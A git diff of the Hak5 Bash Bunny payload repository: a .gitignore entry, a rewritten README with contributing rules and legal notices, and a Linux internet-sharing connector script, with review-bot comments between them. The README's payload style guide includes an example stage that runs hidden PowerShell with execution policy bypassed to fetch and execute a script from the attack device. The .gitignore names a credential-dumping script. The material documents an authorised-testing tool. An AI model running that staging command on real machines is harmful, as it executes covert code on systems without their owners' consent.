Merge branch 'master' of github.com:sridharas04/bashbunny-payloads
|
@ -1,3 +1,4 @@
|
|||
.DS_Store
|
||||
/.project
|
||||
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
|
||||
bunny_connecter_config.txt
|
||||
|
|
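Review bot: the hunk header (-1,3 +1,4) says one line was added, but this rendering drops the +/- markers, so it is not visible which of the four entries is new. If the addition is `bunny_connecter_config.txt`, that is the right call: the connector script writes the host's interface names, gateway and IP layout into that file, and it should not be committed. `/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1`, however, is a payload resource, and ignoring it conflicts with the README's own rule that a submission must include every file the payload needs to run; either the entry should go, or the payload's README must state where the script comes from. `.DS_Store` without a leading slash matches in every directory, which is the intended behaviour.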
295
README.md
|
@ -1,9 +1,290 @@
|
|||
# Payload Library for the Bash Bunny by Hak5
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
|
||||
![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||
|
||||
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
|
||||
* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
|
||||
* IRC: irc.hak5.org #BashBunny
|
||||
* Discord: https://discord.gg/WuteWPf
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/quickcreds
|
||||
|
||||
### LED
|
||||
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
|
||||
|
||||
# Initialization
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Attack
|
||||
LED ATTACK
|
||||
ATTACKMODE HID ECM_ETHERNET
|
||||
|
||||
### Stages and States
|
||||
Stages should be documented with comments
|
||||
|
||||
# Keystroke Injection Stage
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
|
||||
GET HOST_IP
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
|
||||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
|
|
|
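Review bot: the closing tags in the final Disclaimer are crossed (`<h3><b>As with any script, you are advised to proceed with caution.</h3></b>` and the same pattern on the next heading) and should be `</b></h3>`; the same Disclaimer text also appears twice (as `## Disclaimer` above Contributing and again as `# Disclaimer` at the end), so one copy can go. Several contributing links point at the `hak5/usbrubberducky-payloads` repository rather than this one (the "latest version" link under Purely Destructive payloads, the Payload Configuration anchor under Including URLs, and the Printer-Recon staged example); they should reference this repository's README so Bash Bunny contributors are held to the right standard. The `<b><div align="center">` block after the About paragraph contains only `<br/>` tags and can be dropped. The documentation example's `# Description: Opens hidden powershell and` is cut off mid-sentence. Spelling and grammar to fix: "publically", "seperate", "the work of other's", "should be submit into", "with may include a `FAIL`", and "Provide instructions on how to specific resources should be hosted", which should read "on how specific resources should be hosted". The Legal copyright year reads 2010; confirm that is intended.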
@ -0,0 +1,321 @@
|
|||
#!/bin/bash
|
||||
# Bash Bunny Connector for Linux
|
||||
# EULA https://www.bashbunny.com/licence/eula.txt
|
||||
# License https://www.bashbunny.com/licence/software_licence.txt
|
||||
|
||||
bbver=1
|
||||
BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
|
||||
|
||||
if [ "$EUID" -ne 0 ]
|
||||
then echo "This Bash Bunny Connection script requires root."
|
||||
sudo su -s "$0"
|
||||
exit
|
||||
fi
|
||||
|
||||
function banner {
|
||||
# Show random banner because 1337
|
||||
b=$(( ( RANDOM % 5 ) + 1 ))
|
||||
case "$b" in
|
||||
1)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
2)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
3)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
4)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
5)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function showsettings {
|
||||
printf "\n\
|
||||
$(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
|
||||
to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
|
||||
}
|
||||
|
||||
function menu {
|
||||
start_clean # removes bunny related rules without doing a full flush
|
||||
printf "\n\
|
||||
[$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
|
||||
[$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
|
||||
[$(tput bold)M$(tput sgr0)]anual setup\n\
|
||||
[$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
|
||||
[$(tput bold)Q$(tput sgr0)]uit\n\n "
|
||||
read -r -sn1 key
|
||||
case "$key" in
|
||||
[gG]) guidedsetup;;
|
||||
[mM]) manualsetup;;
|
||||
[cC]) connectsaved;;
|
||||
[aA]) advancedsetup;;
|
||||
[bB]) bunny;;
|
||||
[qQ]) printf "\n"; start_clean; exit;;
|
||||
esac
|
||||
}
|
||||
|
||||
function manualsetup {
|
||||
ipinstalled=$(which ip)
|
||||
if [[ "$?" == 0 ]]; then
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
printf "\n Select Bash Bunny Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " planq
|
||||
if [ "$planq" -eq "$planq" ] 2>/dev/null; then
|
||||
sbunnylan=(${ifaces[planq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n Select Internet Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " inetq
|
||||
if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
|
||||
sbunnywan=(${ifaces[inetq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n$(netstat -nr)\n\n"
|
||||
read -r -p " Specify Default Gateway IP Address: " sbunnygw
|
||||
savechanges
|
||||
else
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
|
||||
menu
|
||||
fi
|
||||
}
|
||||
|
||||
function guidedsetup {
|
||||
hasiproute2=$(which ip)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
|
||||
fi
|
||||
hasdefaultroute=$(ip route)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n No route detected. Check connection and try again.\n"; menu
|
||||
fi
|
||||
|
||||
printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
|
||||
Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
|
||||
case $usedgw in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnygw=($(ip route | grep default | awk {'print $3'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n$(ip route)\n\n"
|
||||
read -r -p " Specify the default gateway by IP address: " sbunnygw
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
|
||||
Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported Internet interface? [Y/n]? " useii
|
||||
case $useii in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnywan=($(ip route | grep default | awk {'print $5'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the internet interface by name: " sbunnywan
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
|
||||
|
||||
a="0"
|
||||
until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
|
||||
do
|
||||
printf "."
|
||||
sleep 1
|
||||
a=$[$a+1]
|
||||
if [[ $a == "51" ]]; then
|
||||
printf "\n "
|
||||
a=0
|
||||
fi
|
||||
done
|
||||
printf "[Checking]"
|
||||
sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
|
||||
bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
|
||||
printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
|
||||
read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
|
||||
case $pi in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnylan=$bunnyiface
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
|
||||
;;
|
||||
esac
|
||||
savechanges
|
||||
}
|
||||
|
||||
function advancedsetup {
|
||||
printf "\n\
|
||||
By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
|
||||
with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
|
||||
The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
|
||||
default, which this script aids in configuring. These IP addresses may\n\
|
||||
be changed if desired by modifying network configs on the Bash Bunny.\n\n"
|
||||
read -r -p " Continue with advanced IP config [y/N]? " qcontinue
|
||||
case $qcontinue in
|
||||
[nN][oO]|[nN]|'') menu ;;
|
||||
[yY][eE][sS]|[yY])
|
||||
read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
|
||||
if [[ $sbunnynet == '' ]]; then
|
||||
sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
|
||||
fi
|
||||
read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
|
||||
if [[ $sbunnynmask == '' ]]; then
|
||||
sbunnynmask=255.255.255.0 #Default netmask for /24 network
|
||||
fi
|
||||
read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
|
||||
if [[ $sbunnyhostip == '' ]]; then
|
||||
sbunnyhostip=172.16.64.64 #IP Address of host computer
|
||||
fi
|
||||
read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
|
||||
if [[ $sbunnyip == '' ]]; then
|
||||
sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
|
||||
fi
|
||||
printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
|
||||
savechanges
|
